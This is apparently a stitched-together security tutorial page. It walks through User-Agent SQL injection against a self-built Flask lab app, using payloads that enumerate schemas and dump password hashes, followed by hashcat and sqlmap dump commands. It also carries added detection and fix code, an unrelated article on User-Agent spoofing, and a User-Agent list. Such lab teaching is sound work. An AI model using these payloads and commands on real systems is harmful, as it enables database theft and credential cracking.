Burp User Agent

According to OWASP, injection attacks are still a common attack vector. There are several tools which can be used to exploit a SQL injection (SQLi) vulnerability; a personal favourite is SQLmap. However, understanding how SQLi works is an important aspect of penetration testing, and it is also crucial to understand how the underlying infrastructure works when conducting these types of attacks. PentestMonkey has a great cheat sheet for conducting manual SQLi.

Developing a vulnerable application

A vulnerable application was developed using Python with its Flask library. And yes, I am fully aware that the application might be a bit silly. However, these types of vulnerabilities are common due to poor coding practices, which is what this example demonstrates. The code snippet above shows how the application extracts the visitor’s User-Agent and IP address. The values are inserted into the logging table under the user_agent and ip columns. From there, the newly logged information is shown to the visitor.

The code itself seems secure enough to many developers, as the SQL query is “properly” formatted and the quotes are placed in the query beforehand. Python’s format feature is widely used among Python programmers, and here the same feature is used to insert the data directly into its place in the query string. This is (of course) secure! Right…?
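The snippet referred to above is an image on the original page, so the block below is an added reconstruction (not the author's code) of the same str.format() pattern, with the parameterized version beside it. It uses an in-memory SQLite table standing in for the MariaDB logging table; the table and column names are the page's, the function names are assumptions.

```python
import sqlite3

# Stand-in for the page's MariaDB database: an in-memory SQLite table with the
# same logging(user_agent, ip) layout (constructed for this example).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE logging (user_agent TEXT, ip TEXT)")
    return conn

def log_visit_vulnerable(conn, user_agent, ip):
    # The pattern the post describes: the quotes are written into the SQL text
    # beforehand and str.format() drops the raw header values between them.
    # Returns True if the statement ran, False if the database rejected it
    # (the page's "Internal Server Error" case).
    query = "INSERT INTO logging (user_agent, ip) VALUES ('{}', '{}')".format(user_agent, ip)
    try:
        conn.execute(query)
        conn.commit()
        return True
    except sqlite3.Error:
        return False

def log_visit_safe(conn, user_agent, ip):
    # Parameterized statement: the values travel separately from the SQL text,
    # so a quote in the User-Agent is stored as data and never parsed as syntax.
    conn.execute("INSERT INTO logging (user_agent, ip) VALUES (?, ?)", (user_agent, ip))
    conn.commit()
    return True

def stored_rows(conn):
    return list(conn.execute("SELECT user_agent, ip FROM logging ORDER BY rowid"))

def db_version(conn):
    # SQLite's equivalent of the VERSION() call used in the post.
    return conn.execute("SELECT sqlite_version()").fetchone()[0]

if __name__ == "__main__":
    conn = make_db()
    print(log_visit_vulnerable(conn, "'", "192.168.0.51"))  # False: malformed query
    payload = "Hello world!', (SELECT sqlite_version()))-- -"
    print(log_visit_vulnerable(conn, payload, "192.168.0.51"))  # True: version lands in ip
    log_visit_safe(conn, payload, "192.168.0.51")  # payload stored literally
    for row in stored_rows(conn):
        print(row)
```

The same header value that breaks the formatted query is stored verbatim by the parameterized one, which is the fix the conclusion of the post recommends.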

The image above shows the application’s feature. When a client visits the web server, the User-Agent and IP address are stored in the database and the visitor is shown the stored values.

Exploitation

The web request is sent to Burp Suite’s Repeater. The User-Agent is modified to Hello world!, which is successfully stored in the database. Great! We can modify the User-Agent and thereby modify the stored value. Now what?

Changing the value to a ' displays an Internal Server Error. This is a clear indication that the value was not understood by the server: the resulting SQL query is malformed.

INSERT INTO logging (user_agent, ip) VALUES (''', '192.168.0.51')

The query above is what was executed by the server. No wonder it threw an error! Three ' followed by a , is bad news for the server, as the SQL query is not complete. However, this is good news for an attacker, as the application is vulnerable to SQLi.

Hello world!', (SELECT VERSION()))-- -

The payload above enters Hello world! into the user_agent column. The ', that follows is used to “break out” of the quoted value and continue the SQL syntax, and from there a subquery selects the database version. The version is 10.3.23-MariaDB-1; MariaDB is a fork of MySQL.

Furthermore, when attempting to enumerate the existing databases, the server throws the error Subquery returns more than 1 row. This is because the INSERT statement only inserts two values: the first for the User-Agent, the second for the IP address. If the requested output contains more than one row (such as a list of databases), the rows must be concatenated into one value; otherwise the SQL query will not work. Listing the current database with Hello world!', (SELECT database())-- - reveals that the database is named platform. However, listing all the databases is preferred.

However, without all table and column names in the database, there is still “nothing” we can do. Therefore, the database’s contents must be enumerated further.

Hello world!', (SELECT GROUP_CONCAT(schema_name) FROM information_schema.schemata))-- -

The output shows that there are two databases: information_schema and platform. They are concatenated together because of the single-value output limitation.

Hello world!', (SELECT GROUP_CONCAT(table_schema, table_name, column_name) FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'))-- -

The query above enumerates all tables and columns outside the mysql and information_schema databases, i.e. those of the platform database. The output shows a series of interesting tables, such as usernames and passwords.

The table and column names in the platform database have now been discovered. The final step is to select these values.

The usernames were successfully extracted from the usernames table. However, the values are still concatenated, as the query would not work without the GROUP_CONCAT() function.

The passwords were also successfully extracted from the database. The hashes can now be appropriately formatted before being cracked with either Hashcat or John the Ripper.

gareth:$2a$10$zd96ciX9Z8rWZOGFB7k/ou8gIWLeFqDcFAY9nqkQUui4Gy/vE1gUq
john:$2a$10$MVMc8UJdcP9UrOoN46aNbOn6zP.13jt11uQzQ8xTBoMogaS2gPK.6
foo:$2a$10$FYJCqeO//Uq9EblIO4wfyezxUo.g/qtpynfyAJAe4pv9OPM/XoTuu

hashcat -D 2 -a 0 -m 3200 crack.txt /usr/share/seclists/Passwords/darkc0de.txt

The hashes can be cracked with hashcat using the syntax shown above. Any wordlist will do for weak or common passwords such as these (feel free to crack them). However, ensure that the driver for your GPU is installed, as hashcat supports GPU cracking, which is tremendously faster than cracking on a CPU.

Fast track with SQLmap

sqlmap -u http://192.168.0.51:5000/ --dbms=mysql

The syntax above will automatically attempt to inject different payloads to exploit SQLi vulnerabilities. SQLmap automatically detects injection points, such as user agents, cookies and POST data, and attempts to exploit them. The level of testing can be adjusted with the --level flag.

SQLmap noticed that the User-Agent parameter was injectable, and started to conduct further queries in depth.

sqlmap -u http://192.168.0.51:5000/ --dbms=mysql -D platform -T passwords -C user_password --dump

SQLmap can enumerate the databases (--dbs), tables (--tables), and columns (--columns). After enumerating the tables and columns, the values can be dumped out using --dump, as shown in the syntax above.

The passwords were successfully dumped by SQLmap. This demonstrates that the attacker does not require any advanced SQL knowledge to exploit a SQL vulnerability.
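From the defender's side, the manual payloads above and an SQLmap run both leave recognisable traces in the web server's access log. The check below is an added example (not part of the original post): it scans a few constructed combined-log-format lines and flags User-Agent values carrying the injection patterns used in this post (a quote closing the value early, a SELECT subquery, the -- - comment, information_schema) or SQLmap's default User-Agent prefix. The log format and the sample sqlmap version string are assumptions.

```python
import re

# Constructed combined-log-format lines (not real traffic) for a server such as
# the Flask app in the post; the last quoted field is the User-Agent header.
SAMPLE_LOG = """\
192.168.0.51 - - [01/Jan/2021:10:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0"
192.168.0.51 - - [01/Jan/2021:10:00:05 +0000] "GET / HTTP/1.1" 200 512 "-" "Hello world!"
192.168.0.51 - - [01/Jan/2021:10:00:09 +0000] "GET / HTTP/1.1" 500 290 "-" "'"
192.168.0.51 - - [01/Jan/2021:10:00:14 +0000] "GET / HTTP/1.1" 200 540 "-" "Hello world!', (SELECT GROUP_CONCAT(schema_name) FROM information_schema.schemata))-- -"
192.168.0.51 - - [01/Jan/2021:10:01:00 +0000] "GET / HTTP/1.1" 200 512 "-" "sqlmap/1.4.9#stable (http://sqlmap.org)"
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "[^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>.*)"$'
)

# Patterns taken from the payloads used in the post, plus sqlmap's default
# User-Agent prefix ("sqlmap/<version> ..."; the sample value above is constructed).
SQLI_UA_RULES = [
    ("quote_breakout", re.compile(r"'\s*,")),             # ', closes the user_agent value early
    ("subquery", re.compile(r"\(\s*SELECT\b", re.I)),      # (SELECT ...) supplied as the second value
    ("comment_tail", re.compile(r"--\s*-?\s*$")),          # -- - swallows the rest of the statement
    ("schema_enum", re.compile(r"information_schema", re.I)),
    ("sqlmap_ua", re.compile(r"^sqlmap/", re.I)),
]

def scan_access_log(log_text):
    """Return one finding per suspicious line: client, HTTP status and matched rules."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        ua = m["ua"]
        rules = [name for name, rx in SQLI_UA_RULES if rx.search(ua)]
        # An unmatched quote is the probe that produced the 500 in the post.
        if ua.count("'") % 2 == 1:
            rules.append("unbalanced_quote")
        if rules:
            findings.append({"line": line_no, "client": m["client"],
                             "status": int(m["status"]), "rules": rules})
    return findings

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

A 500 response paired with an unbalanced quote in the User-Agent, followed by requests from the same client that match several rules, is the sequence this post walks through and is worth an alert on its own.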

Conclusion

SQL vulnerabilities are very serious, as they could lead to exposure of the entire database. Prepared statements should be used to ensure that user input cannot “break out” and modify the SQL query.

Automated tools can also exploit this type of vulnerability, which could lead to remote access. SQLmap has a feature called --os-shell, which uploads a fully interactive web shell to the targeted system; the web shells are supported on ASP, ASPX, JSP and PHP. Not only can SQLmap expose the entire database, it can also grant a reverse shell. SQLmap allows an attacker with very little knowledge to exploit a SQL vulnerability.

User Agent (用户代理), abbreviated UA, is a special string header that lets a server identify the client's operating system and version, CPU type, browser and version, browser rendering engine, browser language, browser plugins, and so on.

Some websites decide from the UA which page to send to different operating systems and browsers, so certain pages may not display correctly in a given browser. Some phishing sites also check the device type and push different content. The phishing site below, for instance, only shows a one-line notice when visited from a PC, whereas visiting it from a phone reveals its full content.

What it looks like when visited from a PC

What it looks like when visited from a phone

So how can we see, on a PC, content that is only shown to phones? By modifying the user-agent. Three methods are summarised below.

Method 1: Chrome's built-in device emulation

Chrome -> F12 -> Ctrl+Shift+M -> choose a device -> visit the site

Method 2: Firefox extension

Install the User-Agent Switcher extension -> choose the device setting -> visit the site

Method 3: Modifying the request in Burp Suite

Set the browser proxy -> start Burp Suite -> intercept the request -> modify it

Simply replace the user-agent value marked with the red line.
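The three methods above compare a site's responses across devices by hand. As an added example (not from the original article), the helper below automates that comparison: it fetches a URL once per User-Agent profile and reports whether the server returned different bodies, which is the UA-based cloaking the article describes. The UA strings come from the article's own list; the fetch function is injectable so the logic can be exercised offline with a constructed stand-in.

```python
import hashlib
import urllib.request

# Two profiles taken from the article's User-Agent list: one desktop, one phone.
UA_PROFILES = {
    "windows_firefox": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0",
    "iphone_safari": ("Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) "
                      "AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5"),
}

def http_fetch(url, user_agent, timeout=10):
    """Fetch url with the given User-Agent and return the response body as bytes."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read()

def compare_by_user_agent(url, profiles=UA_PROFILES, fetch=http_fetch):
    """Fetch url once per profile.

    Returns ({profile: (sha256, length)}, cloaked), where cloaked is True if at
    least two profiles received different response bodies.
    """
    results = {}
    for name, ua in profiles.items():
        body = fetch(url, ua)
        results[name] = (hashlib.sha256(body).hexdigest(), len(body))
    cloaked = len({digest for digest, _ in results.values()}) > 1
    return results, cloaked

def fake_cloaking_fetch(url, user_agent):
    """Constructed stand-in for a site that hides its real page from desktops."""
    if "iPhone" in user_agent:
        return b"<html><body>full phishing page shown only to phones</body></html>"
    return b"<html><body>please open this link on your phone</body></html>"

if __name__ == "__main__":
    # Offline demonstration; swap fetch=http_fetch for a live check.
    results, cloaked = compare_by_user_agent("http://example.invalid/", fetch=fake_cloaking_fetch)
    print(results, cloaked)
```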

Appendix: common User-Agents

Desktop User-Agents

Safari 5.1 – Mac

User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50

Safari 5.1 – Windows

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50

Firefox 38esr

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0

IE 11

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; rv:11.0) like Gecko

IE 9.0

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;

IE 8.0

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)

IE 7.0

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)

IE 6.0

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

Firefox 4.0.1 – Mac

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1

Firefox 4.0.1 – Windows

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1

Opera 11.11 – Mac

User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11

Opera 11.11 – Windows

User-Agent: Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11

Chrome 17.0 – Mac

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11

Maxthon (傲游)

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)

Tencent TT

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0)

The World (世界之窗) 2.x

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

The World (世界之窗) 3.x

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; The World)

Sogou Browser 1.x

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SE2.X MetaSr 1.0; SE 2.X MetaSr 1.0; .NET CLR 2.0.50727; SE 2.X MetaSr 1.0)

360 Browser

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)

Avant

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser)

Green Browser

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Mobile User-Agents

Safari iOS 4.33 – iPhone

User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5

Safari iOS 4.33 – iPod Touch

User-Agent: Mozilla/5.0 (iPod; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5

Safari iOS 4.33 – iPad

User-Agent: Mozilla/5.0 (iPad; U; CPU OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5

Android N1

User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.7; en-us; Nexus One Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1

Android QQ Browser

User-Agent: MQQBrowser/26 Mozilla/5.0 (Linux; U; Android 2.3.7; zh-cn; MB200 Build/GRJ22; CyanogenMod-7) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1

Android Opera Mobile

User-Agent: Opera/9.80 (Android 2.3.4; Linux; Opera Mobi/build-1107180945; U; en-GB) Presto/2.8.149 Version/11.10

Android Pad Moto Xoom

User-Agent: Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13

BlackBerry

User-Agent: Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/534.1+ (KHTML, like Gecko) Version/6.0.0.337 Mobile Safari/534.1+

WebOS HP Touchpad

User-Agent: Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.0; U; en-US) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/233.70 Safari/534.6 TouchPad/1.0

Nokia N97

User-Agent: Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/20.0.019; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/525 (KHTML, like Gecko) BrowserNG/7.1.18124

Windows Phone Mango

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; HTC; Titan)

UC (no device)

User-Agent: UCWEB7.0.2.37/28/999

UC standard

User-Agent: NOKIA5700/ UCWEB7.0.2.37/28/999

UC Openwave

User-Agent: Openwave/ UCWEB7.0.2.37/28/999

UC Opera

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; ) Opera/UCWEB7.0.2.37/28/999